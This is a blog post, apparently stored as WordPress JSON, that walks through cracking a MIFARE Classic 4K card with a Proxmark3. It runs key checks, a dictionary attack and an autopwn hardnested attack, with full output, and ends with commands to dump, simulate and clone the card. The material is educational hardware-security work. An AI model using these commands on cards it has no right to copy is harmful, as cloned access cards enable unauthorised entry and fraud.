![\"\"](\"https:\/\/labalec.fr\/erwan\/wp-content\/uploads\/2024\/07\/proxmark3.jpeg\")
<\/a><\/figure>\n\n\n\nLets start with identifying the card we have in hands.<\/p>\n\n\n\n
<\/p>\n\n\n\n
[usb] pm3 --> hf search\n[|] Searching for ISO14443-A tag\u2026\n[+] UID: 94 13 70 EE\n[+] ATQA: 00 02\n[+] SAK: 18 [2]\n[+] Possible types:\n[+] MIFARE Classic 4K\n[=] proprietary non iso14443-4 card found, RATS not supported\n[+] Prng detection\u2026\u2026. hard\n[?] Hint: try hf mf commands\n\n[+] Valid ISO 14443-A tag found<\/code><\/pre>\n\n\n\nWhat we got here is a mifare classic 4k.<\/p>\n\n\n\n
Lets see if we can find keys to decrypt this card with a simple (but fast) chk command.<\/p>\n\n\n\n
[usb] pm3 --> hf mf chk --4k\n[+] loaded 61 keys from hardcoded default array\n[=] Start check for keys...\n[=] .................................................................................\n[=] time in checkkeys 12 seconds\n\n[=] testing to read key B...\n\n[+] found keys:\n\n[+] -----+-----+--------------+---+--------------+----\n[+] Sec | Blk | key A |res| key B |res\n[+] -----+-----+--------------+---+--------------+----\n[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1\n[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1\n[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 031 | 127 | ------------ | 0 | ------------ | 0\n[+] 032 | 143 | ------------ | 0 | ------------ | 0\n[+] 033 | 159 | ------------ | 0 | ------------ | 0\n[+] 034 | 175 | ------------ | 0 | ------------ | 0\n[+] 035 | 191 | ------------ | 0 | ------------ | 0\n[+] 036 | 207 | ------------ | 0 | ------------ | 0\n[+] 037 | 223 | ------------ | 0 | ------------ | 0\n[+] 038 | 239 | ------------ | 0 | ------------ | 0\n[+] 039 | 255 | ------------ | 0 | ------------ | 0\n[+] -----+-----+--------------+---+--------------+----\n[+] ( 0:Failed \/ 1:Success )\n[?] MAD key detected. Try `hf mf mad` for more details<\/code><\/pre>\n\n\n\nWe got some keys missing … lets try with a dictionary attack.<\/p>\n\n\n\n
[usb] pm3 --> hf mf chk --4k -f mfc_default_keys\n[+] loaded 61 keys from hardcoded default array\n[+] Loaded 1887 keys from dictionary file `C:\\_apps\\ProxSpace\\pm3\\proxmark3\\client\\dictionaries\/mfc_default_keys.dic`\n[=] Start check for keys...\n[=] ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\n[=] time in checkkeys 249 seconds\n\n[=] testing to read key B...\n\n[+] found keys:\n\n[+] -----+-----+--------------+---+--------------+----\n[+] Sec | Blk | key A |res| key B |res\n[+] -----+-----+--------------+---+--------------+----\n[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1\n[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1\n[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] 031 | 127 | ------------ | 0 | ------------ | 0\n[+] 032 | 143 | ------------ | 0 | ------------ | 0\n[+] 033 | 159 | ------------ | 0 | ------------ | 0\n[+] 034 | 175 | ------------ | 0 | ------------ | 0\n[+] 035 | 191 | ------------ | 0 | ------------ | 0\n[+] 036 | 207 | ------------ | 0 | ------------ | 0\n[+] 037 | 223 | ------------ | 0 | ------------ | 0\n[+] 038 | 239 | ------------ | 0 | ------------ | 0\n[+] 039 | 255 | ------------ | 0 | ------------ | 0\n[+] -----+-----+--------------+---+--------------+----\n[+] ( 0:Failed \/ 1:Success )\n[?] MAD key detected. Try `hf mf mad` for more details<\/code><\/pre>\n\n\n\nStill no luck…<\/p>\n\n\n\n
Lets be more aggressive with a autopwn attack which will basically use all possible attacks (sparing us the hassle to to try them one by one or in some cases going block per block).<\/p>\n\n\n\n
Note that I am skipping the -f mfc_default_keys.dic here since the previous dictionary attack did not prove useful.<\/p>\n\n\n\n
[usb] pm3 --> hf mf autopwn --4k\n[!] no known key was supplied, key recovery might fail\n[+] loaded 5 user keys\n[+] loaded 61 keys from hardcoded default array\n[=] running strategy 1\n[=] ...\n[=] running strategy 2\n[=] ....\n[+] target sector 0 key type A -- found valid key [ A0A1A2A3A4A5 ] (used for nested \/ hardnested attack)\n[+] target sector 0 key type B -- found valid key [ B0B1B2B3B4B5 ]\n[+] target sector 1 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 1 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 2 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 2 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 3 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 3 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 4 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 4 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 5 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 5 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 6 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 6 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 7 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 7 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 8 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 8 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 9 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 9 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 10 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 10 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 11 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 11 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 12 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 12 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 13 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 13 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 14 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 14 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 15 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 15 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 16 key type A -- found valid key [ A0A1A2A3A4A5 ]\n[+] target sector 16 key type B -- found valid key [ B0B1B2B3B4B5 ]\n[+] target sector 17 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 17 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 18 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 18 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 19 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 19 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 20 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 20 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 21 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 21 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 22 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 22 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 23 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 23 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 24 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 24 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 25 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 25 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 26 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 26 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 27 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 27 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 28 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 28 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 29 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 29 key type B -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 30 key type A -- found valid key [ FFFFFFFFFFFF ]\n[+] target sector 30 key type B -- found valid key [ FFFFFFFFFFFF ]\n[=] Hardnested attack starting...\n[=] ---------+---------+---------------------------------------------------------+-----------------+-------\n[=] | | | Expected to brute force\n[=] Time | #nonces | Activity | #states | time\n[=] ---------+---------+---------------------------------------------------------+-----------------+-------\n[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |\n[=] 0 | 0 | Brute force benchmark: 509 million (2^28.9) keys\/s | 140737488355328 | 3d\n[=] 5 | 0 | Loaded 0 RAW \/ 351 LZ4 \/ 0 BZ2 in 5226 ms | 140737488355328 | 3d\n[=] 5 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 3d\n[=] 10 | 112 | Apply bit flip properties | 35058302976 | 69s\n[=] 11 | 224 | Apply bit flip properties | 24066930688 | 47s\n[=] 12 | 334 | Apply bit flip properties | 17448558592 | 34s\n[=] 13 | 444 | Apply bit flip properties | 9945160704 | 20s\n[=] 14 | 555 | Apply bit flip properties | 9036183552 | 18s\n[=] 15 | 667 | Apply bit flip properties | 7640147968 | 15s\n[=] 16 | 779 | Apply bit flip properties | 6678748160 | 13s\n[=] 17 | 890 | Apply bit flip properties | 6678748160 | 13s\n[=] 18 | 1000 | Apply bit flip properties | 6347502592 | 12s\n[=] 18 | 1112 | Apply bit flip properties | 6347502592 | 12s\n[=] 18 | 1223 | Apply bit flip properties | 6347502592 | 12s\n[=] 19 | 1332 | Apply bit flip properties | 6347502592 | 12s\n[=] 20 | 1442 | Apply bit flip properties | 6347502592 | 12s\n[=] 23 | 1552 | Apply Sum property. Sum(a0) = 128 | 262742304 | 1s\n[=] 24 | 1664 | Apply bit flip properties | 262742304 | 1s\n[=] 25 | 1771 | Apply bit flip properties | 262742304 | 1s\n[=] 26 | 1879 | Apply bit flip properties | 262742304 | 1s\n[=] 26 | 1879 | (Ignoring Sum(a8) properties) | 262742304 | 1s\n[=] 27 | 1879 | Brute force phase completed. Key found: E704822D6AED | 0 | 0s\n[+] target sector 31 key type A -- found valid key [ E704822D6AED ]\n[=] Hardnested attack starting...\n[=] ---------+---------+---------------------------------------------------------+-----------------+-------\n[=] | | | Expected to brute force\n[=] Time | #nonces | Activity | #states | time\n[=] ---------+---------+---------------------------------------------------------+-----------------+-------\n[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |\n[=] 0 | 0 | Brute force benchmark: 493 million (2^28.9) keys\/s | 140737488355328 | 3d\n[=] 3 | 0 | Loaded 0 RAW \/ 351 LZ4 \/ 0 BZ2 in 2696 ms | 140737488355328 | 3d\n[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 3d\n[=] 7 | 112 | Apply bit flip properties | 646552223744 | 22min\n[=] 8 | 224 | Apply bit flip properties | 495434760192 | 17min\n[=] 9 | 336 | Apply bit flip properties | 474214105088 | 16min\n[=] 10 | 448 | Apply bit flip properties | 422348587008 | 14min\n[=] 11 | 560 | Apply bit flip properties | 422348587008 | 14min\n[=] 12 | 671 | Apply bit flip properties | 422348587008 | 14min\n[=] 13 | 783 | Apply bit flip properties | 422348587008 | 14min\n[=] 14 | 893 | Apply bit flip properties | 422348587008 | 14min\n[=] 15 | 1005 | Apply bit flip properties | 369272356864 | 12min\n[=] 15 | 1117 | Apply bit flip properties | 369272356864 | 12min\n[=] 16 | 1227 | Apply bit flip properties | 369272356864 | 12min\n[=] 17 | 1338 | Apply bit flip properties | 369272356864 | 12min\n[=] 17 | 1447 | Apply bit flip properties | 369272356864 | 12min\n[=] 18 | 1559 | Apply bit flip properties | 369272356864 | 12min\n[=] 19 | 1669 | Apply bit flip properties | 369272356864 | 12min\n[=] 20 | 1776 | Apply bit flip properties | 369272356864 | 12min\n[=] 21 | 1887 | Apply bit flip properties | 369272356864 | 12min\n[=] 23 | 1997 | Apply Sum property. Sum(a0) = 128 | 54618914816 | 2min\n[=] 24 | 2106 | Apply bit flip properties | 54618914816 | 2min\n[=] 25 | 2215 | Apply bit flip properties | 54618914816 | 2min\n[=] 25 | 2324 | Apply bit flip properties | 54618914816 | 2min\n[=] 26 | 2324 | (Ignoring Sum(a8) properties) | 54618914816 | 2min\n[=] 89 | 2324 | Brute force phase completed. Key found: EAE581E19550 | 0 | 0s\n[+] target sector 31 key type B -- found valid key [ EAE581E19550 ]\n[=] Hardnested attack starting...\n[=] ---------+---------+---------------------------------------------------------+-----------------+-------\n[=] | | | Expected to brute force\n[=] Time | #nonces | Activity | #states | time\n[=] ---------+---------+---------------------------------------------------------+-----------------+-------\n[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |\n[=] 0 | 0 | Brute force benchmark: 411 million (2^28.6) keys\/s | 140737488355328 | 4d\n[=] 3 | 0 | Loaded 0 RAW \/ 351 LZ4 \/ 0 BZ2 in 2965 ms | 140737488355328 | 4d\n[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 4d\n[=] 7 | 112 | Apply bit flip properties | 1300592066560 | 53min\n[=] 8 | 224 | Apply bit flip properties | 956737191936 | 39min\n[=] 9 | 336 | Apply bit flip properties | 788323893248 | 32min\n[=] 10 | 448 | Apply bit flip properties | 699458519040 | 28min\n[=] 11 | 559 | Apply bit flip properties | 611835576320 | 25min\n[=] 12 | 669 | Apply bit flip properties | 604953968640 | 25min\n[=] 13 | 781 | Apply bit flip properties | 546183413760 | 22min\n[=] 14 | 891 | Apply bit flip properties | 497112612864 | 20min\n[=] 15 | 1002 | Apply bit flip properties | 497112612864 | 20min\n[=] 16 | 1110 | Apply bit flip properties | 497112612864 | 20min\n[=] 18 | 1221 | Apply Sum property. Sum(a0) = 160 | 30699894784 | 75s\n[=] 18 | 1331 | Apply bit flip properties | 29279275008 | 71s\n[=] 19 | 1439 | Apply bit flip properties | 29279275008 | 71s\n[=] 20 | 1547 | Apply bit flip properties | 29279275008 | 71s\n[=] 21 | 1658 | Apply bit flip properties | 28913727488 | 70s\n[=] 21 | 1658 | (1. guess: Sum(a8) = 0) | 28913727488 | 70s\n[=] 22 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 28548368384 | 69s\n[=] 22 | 1658 | (2. guess: Sum(a8) = 32) | 96629514240 | 4min\n[=] 23 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 96404660224 | 4min\n[=] 23 | 1658 | (3. guess: Sum(a8) = 64) | 201095266304 | 8min\n[=] 25 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 199944667136 | 8min\n[=] 25 | 1658 | Brute force phase completed. Key found: A989077ECCED | 0 | 0s\n[+] target sector 32 key type A -- found valid key [ A989077ECCED ]\n[+] target sector 32 key type B -- found valid key [ A989077ECCED ]\n[+] target sector 33 key type A -- found valid key [ A989077ECCED ]\n[+] target sector 33 key type B -- found valid key [ A989077ECCED ]\n[+] target sector 34 key type A -- found valid key [ A989077ECCED ]\n[+] target sector 34 key type B -- found valid key [ A989077ECCED ]\n[+] target sector 35 key type A -- found valid key [ A989077ECCED ]\n[+] target sector 35 key type B -- found valid key [ A989077ECCED ]\n[+] target sector 36 key type A -- found valid key [ A989077ECCED ]\n[+] target sector 36 key type B -- found valid key [ A989077ECCED ]\n[+] target sector 37 key type A -- found valid key [ A989077ECCED ]\n[+] target sector 37 key type B -- found valid key [ A989077ECCED ]\n[+] target sector 38 key type A -- found valid key [ A989077ECCED ]\n[+] target sector 38 key type B -- found valid key [ A989077ECCED ]\n[+] target sector 39 key type A -- found valid key [ A989077ECCED ]\n[+] target sector 39 key type B -- found valid key [ A989077ECCED ]\n\n[+] found keys:\n\n[+] -----+-----+--------------+---+--------------+----\n[+] Sec | Blk | key A |res| key B |res\n[+] -----+-----+--------------+---+--------------+----\n[+] 000 | 003 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D\n[+] 001 | 007 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 002 | 011 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 006 | 027 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 016 | 067 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D\n[+] 017 | 071 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 018 | 075 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 019 | 079 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 020 | 083 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 021 | 087 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 022 | 091 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 023 | 095 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 024 | 099 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 025 | 103 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 026 | 107 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 027 | 111 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 028 | 115 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 029 | 119 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 030 | 123 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D\n[+] 031 | 127 | E704822D6AED | H | EAE581E19550 | H\n[+] 032 | 143 | A989077ECCED | H | A989077ECCED | R\n[+] 033 | 159 | A989077ECCED | R | A989077ECCED | R\n[+] 034 | 175 | A989077ECCED | R | A989077ECCED | R\n[+] 035 | 191 | A989077ECCED | R | A989077ECCED | R\n[+] 036 | 207 | A989077ECCED | R | A989077ECCED | R\n[+] 037 | 223 | A989077ECCED | R | A989077ECCED | R\n[+] 038 | 239 | A989077ECCED | R | A989077ECCED | R\n[+] 039 | 255 | A989077ECCED | R | A989077ECCED | R\n[+] -----+-----+--------------+---+--------------+----\n[=] ( D:Dictionary \/ S:darkSide \/ U:User \/ R:Reused \/ N:Nested \/ H:Hardnested \/ C:statiCnested \/ A:keyA )\n[?] MAD key detected. Try `hf mf mad` for more details\n\n\n[+] Generating binary key file\n[+] Found keys have been dumped to `C:\\_apps\\ProxSpace\\pm3\/hf-mf-941370EE-key.bin`\n[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0\n[=] transferring keys to simulator memory ( ok )\n[=] dumping card content to emulator memory (Cmd Error: 04 can occur)\n[=] downloading card content from emulator memory\n[+] Saved 4096 bytes to binary file `C:\\_apps\\ProxSpace\\pm3\/hf-mf-941370EE-dump.bin`\n[+] Saved to json file `C:\\_apps\\ProxSpace\\pm3\/hf-mf-941370EE-dump.json`\n[=] autopwn execution time: 166 seconds<\/code><\/pre>\n\n\n\nOk, this time we got lucky and all keys were found within 166 seconds (on my slow computer…).<\/p>\n\n\n\n
Note that the keys have been conveniently dumped to hf-mf-941370EE-key.bin.<\/p>\n\n\n\n
The content of the card itself has been dumped to hf-mf-941370EE-dump.bin.<\/p>\n\n\n\n
At this stage you can dump the card (again) at any point with this command: <\/p>\n\n\n\n
hf mf dump --4k --keys hf-mf-941370EE-key.bin<\/code><\/pre>\n\n\n\nYou can also simulate the card with this command :<\/p>\n\n\n\n
hf mf sim -u 941370EE --4k<\/code><\/pre>\n\n\n\nAnd last but not least you can restore the dump to a blank card (effectively cloning the original card) with this command :<\/p>\n\n\n\n
#for a gen1 card\nhf mf cload --4k -f hf-mf-941370EE-dump.bin\n#for a gen2 card - notice that you need the keyfile of the target card to be able to write your dump\n#note that we are passing the original uid sparing us the extra command hf mf csetuid -u 941370EE \nhf mf restore --4k --uid 941370EE -k hf-mf-target-key.bin -f hf-mf-941370EE-dump.bin<\/code><\/pre>\n\n\n\nExtra notes, you can test the reading with a block or sector with a key the following way :<\/p>\n\n\n\n
hf mf rdbl --blk 127 -b -k EAE581E19550\nhf mf rdsc --sec 31 -a -k E704822D6AED<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"I got myself a proxmark3 device lately, for fun. I will not spend time explaining how to flash the device or install proxspace and pm3 as it all explained here. Lets start with identifying the card we have in hands. What we got here is a mifare classic 4k. Lets see if we can find […]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[143],"tags":[],"class_list":["post-2504","post","type-post","status-publish","format-standard","hentry","category-proxmark3","category-143-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2504"}],"version-history":[{"count":16,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2504\/revisions"}],"predecessor-version":[{"id":2530,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2504\/revisions\/2530"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}